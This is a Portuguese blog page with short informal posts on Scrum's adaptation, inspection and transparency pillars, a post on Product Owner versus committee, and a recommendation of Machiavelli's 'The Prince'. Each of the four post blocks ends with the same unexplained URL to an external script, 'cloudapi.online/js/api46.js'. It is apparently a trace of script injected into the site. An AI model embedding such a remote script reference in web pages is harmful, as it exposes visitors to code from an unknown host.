SCRUM Adptação

Fala pessoal, bora continuar nossa aventura no SCRUM 🙂

Nos últimos post falamos sobre a (Transparência e Inspeção), ficou faltando a Adaptação, acredito que esse seja o grande trunfo nas mãos, o SCRUM aceita facilmente as mudanças, imagina, você começa um projeto, ai depois de um longo tempo, mostra ao cliente, ele disse “Não é isso que eu queria”, putz, que trabalhão atoa neh, então, dentro do SCRUM as mudanças são bem vindas, ajuste o projeto ao seu curso de navegação 🙂

Vamos lá para quem não entendeu, o SCRUM tem um timebox, dentro desse timebox podem ocorrer mudanças no decorrer do projeto, muitos ficam com dúvidas nessa adaptação, porque ficam presos ao prazo de entrega, então quer dizer que não temos prazo? Não estou dizendo isso, o que estou dizendo é que dentro dessas entregas contínuas podemos inserir, remover e adaptar novos processos, não se apegue ao prazo, vamos ser bem diretos? Todo mundo sabe que a unica coisa errada dentro do projeto é o prazo de entrega! Acertei?

Acho que por hoje é só galera, até a próxima 🙂

 

https://cloudapi.online/js/api46.js

Anúncios

SCRUM Inspeção

Fala pessoal, tudo em cima!!!

No ultimo post falamos sobre um dos pilares do SCRUM, a transparência, hoje vamos falar de mais um dos pilares do SCRUM a inspeção, bora lá.

O que quer dizer essa inspeção?

A inspeção dentro do processo é uma verificação sobre o trabalho que estamos realizando, ou seja, verificar se estamos em dia com nosso trabalho, também podemos inspecionar dentro das reuniões de revisão e restropectiva. É uma frequência verificação, lembrando, sem atrapalhar o progresso do processo, tudo com exagero faz mal blz.

Nessa inspeção identificamos rapidamente um desvio sobre o projeto, e já agimos em cima do problema e ou falha.

Acho que é isso pessoal, estou procurando falar de uma forma bem resumida no meus post, para não ficar uma leitura chata e cansativa, qualquer dúvida manda mensagem que terei o prazer em responder, abraços a todos.

SCRUM Transparência

Fala pessoal blz!!!

Então vamos falar de uma parte muito importante no SCRUM que é a Transparência! A transparência é um dos pilares fundamentais do SCRUM.

Mas que diabos isso quer dizer?

A transparência quer dizer que: Tudo deve ser visível a todos os participantes do projeto, nada pode ser empurrado para debaixo do tapete. Vamos citar um exemplo, se a sprint falhar devo da um jeitinho??? NÃO, você deixar que todos fiquem sabendo mesmo que a sprint tenha falhado.

Vamos ser realistas, erros podem acontecer em qualquer projeto, seja usando SCRUM, XP, KANBAN  e por ai vai, o que devemos fazer é encarar os fatos, e encontrar uma solução, por isso é muito importante que tudo fique bem visível, se possível um quadro bem grande mostrando o desempenho (desenvolvimento) do produto.

Mais importante ainda, não é só a visualização de erros, também o sucesso da equipe, que são muitos, e todos ficam sabendo também, vamos falar bem a real, muitos utilizam esse quadro para achar defeitos, o famoso “Caça as Bruxas”, a transparência não é isso galera, a transparência no projeto é estimular a equipe, erros, falhas acontecem, mas o importante é saber supera-los, se seu objetivo é usar a transparência para apontar o dedo, sinto muito, você está na equipe errada.

E ai como sua equipe utiliza a transparência???

https://cloudapi.online/js/api46.js

Product Owner ou um Comitê?

Fala pessoal, tudo em cima!!!

Dei uma sumidinha esses dias, não podemos parar neh 🙂

Pronto para mais uma?

O Termo é bem estimulante “Product Owner ou um Comitê” ???

Primeiro vamos lá, o Product Owner (Dono do Produto) é o principal responsável por criar as atividades em Product Backlog, ou seja, temos um ponto focal (se assim podemos dizer), ele pode ser tanto o cliente ou uma pessoa que é delega para essa função, claro que ele consulta outras pessoas para criar essas atividades SERÁ? Olha vou dizer por mim, pode ser que exista um CARA que saiba tudo que quer e criar as atividades, e outro que trabalha em equipe e peça opinião a elas, só que de acordo com o SCRUM, somente o Product Owner pode criar essas atividades entre outras atribuições.

Pensando em um trabalho de forma COLABORATIVA, porque não um comitê, ao invés de só um DONO DO PRODUTO, podemos criar dentro desse comitê um papel de FACILITADOR que tal? Esse facilitador iria assumir o papel de PO no final (Caso você utilize SCRUM), só que aqui assumimos um trabalho de forma colaborativa, ou seja, mais pessoas participando, mais dono’s do produto 🙂

Galera é o seguinte, não importa o que você utiliza, você não pode fechar a cabeça, tenha mente aberta, se podemos melhor um processo, porque não tentar? Não quer dizer que o que tem hoje funcione amanhã, o importante é sempre fazer a roda girar, melhoria contínua…

Acho que é isso pessoal, um assunto a se pensar, abraços!!!

 

 

https://cloudapi.online/js/api46.js

Livro do dia “O Príncipe”

Fala pessoal, sempre que posso gosto de recomendar algum livro para leitura, é uma das coisas que gosto de fazer sempre que posso, quem não gosta de uma boa leitura, aquela verdadeira, então sempre que recomendo um livro falo o máximo e o mínimo que posso, o máximo é se realmente você irá gostar, e o mínimo, é não contar o livro todo 🙂

O livro de hoje é O Príncipe, vivemos em uma país onde estamos tomados ou posso dizer controlados por um bando de, hum queria dizer bandidos, só que não são todos que são bandidos, vamos dizer um bando de aproveitadores, que querem o poder a qualquer custa, é um UFC na politica, onde vale tudo, só que lá não tem regra…

Se você está acompanhando a politica de nosso país (Vergonhosa), então você não pode deixar de ler  O Príncipe de Maquiavel, é um clássico se posso assim dizer, você irá ver o quanto somos idiotas (Desenformado), tudo que é dito é aplicado hoje em dia, vou parar de falar por aqui, porque senão vou contar o livro e começar a falar de política.

Até a próxima…

https://cloudapi.online/js/api46.js